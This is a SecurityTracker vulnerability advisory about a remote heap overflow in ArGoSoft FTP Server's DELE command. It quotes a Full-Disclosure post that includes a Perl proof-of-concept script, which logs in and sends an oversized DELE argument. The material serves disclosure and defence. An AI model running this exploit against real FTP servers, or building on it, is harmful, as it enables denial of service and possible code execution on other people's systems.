SecurityTracker.com
Keep Track of the Latest Vulnerabilities
with SecurityTracker!
    Home    |    View Topics    |    Search    |    Contact Us    |   

SecurityTracker
Archives


Try our Premium Alert Service
 
Sign Up
Sign Up for Your FREE Weekly SecurityTracker E-mail Alert Summary
Instant Alerts
Buy our Premium Vulnerability Notification Service to receive customized, instant alerts
Affiliates
Put SecurityTracker Vulnerability Alerts on Your Web Site -- It's Free!
Partners
Become a Partner and License Our Database or Notification Service





Category:   Application (File Transfer/Sharing)  >   ArGoSoft FTP Server Vendors:   ArGo Software Design
ArGoSoft FTP Server Buffer Overflow in DELE Command Lets Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1015681
SecurityTracker URL:  http://securitytracker.com/id/1015681
CVE Reference:   GENERIC-MAP-NOMATCH   (Links to External Site)
Date:  Feb 25 2006
Impact:   Execution of arbitrary code via network
Exploit Included:  Yes  
Version(s): 1.4.3.5 and prior versions
Description:   A vulnerability was reported in ArGoSoft FTP Server. A remote authenticated user can execute arbitrary code on the target system.

A remote authenticated user can suply a specially crafted FTP DELE command parameter to trigger an overflow and execute arbitrary code on the target system.

Jerome Athias discovered this vulnerability.

Impact:   A remote authenticated user can execute arbitrary code on the target system.
Solution:   No solution was available at the time of this entry.
Vendor URL:  www.argosoft.com/ (Links to External Site)
Cause:   Boundary error
Underlying OS:  Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] ArGoSoft FTP server remote heap overflow

-- Title:
ArGoSoft FTP server remote heap overflow

-- Affected Products:
ArGoSoft FTP server 1.4.3.5 (current) and prior

-- Affected Vendor:
ArGoSoft - http://www.argosoft.com

-- Impact:
DoS, Arbitrary Code Execution

-- Where:
>From remote

-- Type:
Heap Overflow

-- Vulnerability Details:
A remote attacker with valid credentials is able to trigger a heap
overwrite in ArgoSoft FTP server.
The bug occurs by providing a long argument to the DELE command. This
vulnerability can allow remote attackers to execute arbitrary code or
launch a denial of service attack.

-- Credit:
This vulnerability was discovered by Jerome Athias.
https://www.securinfos.info/english/




#!/usr/bin/perl

# ---------------------------------------------------- #
# ArgoSoftFTP.pl - PoC exploit for ArgoSoft FTP Server #
# Jerome Athias                           #
# ---------------------------------------------------- #

use Net::FTP;

# geting data
$host = @ARGV[0];
$port = @ARGV[1];
$debug = @ARGV[2];
$user = @ARGV[3];
$pass = @ARGV[4];

# ===========

if (($host) && ($port)) {
       
# make exploit string
$exploit_string = "DELE ";
$exploit_string .= "A" x 2041;
$exploit_string .= "B" x 4;
$exploit_string .= "C" x 1026;

#    On Win2K SP4 FR:
#    EAX 42424241
#    ECX 43434343
#    EDX 43434342
#    EBX 43434B73

        # ===================
       
        print "Trying to connect to $host:$port\n";
        $sock = Net::FTP->new("$host",Port => $port, TimeOut => 30,
Debug=> $debug) or die "[-] Connection failed\n";
        print "[+] Connect OK!\n";
        print "Logging...\n";
        if (!$user) {
             $user = "test";
             $pass = "test";
        }
        $sock->login($user, $pass);
        $answer = $sock->message;
        print "Sending string...\n";
        $sock->quot($exploit_string);
} else {
        print "ArgoSoft FTP Server - PoC
Exploit\nhttps://www.securinfos.info\n\nUsing: $0 host port username
password [debug: 1 or 0]\n\n";
}
_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

 
 


Go to the Top of This SecurityTracker Archive Page





Home   |    View Topics   |    Search   |    Contact Us

This web site uses cookies for web analytics. Learn More

Copyright 2018, SecurityGlobal.net LLC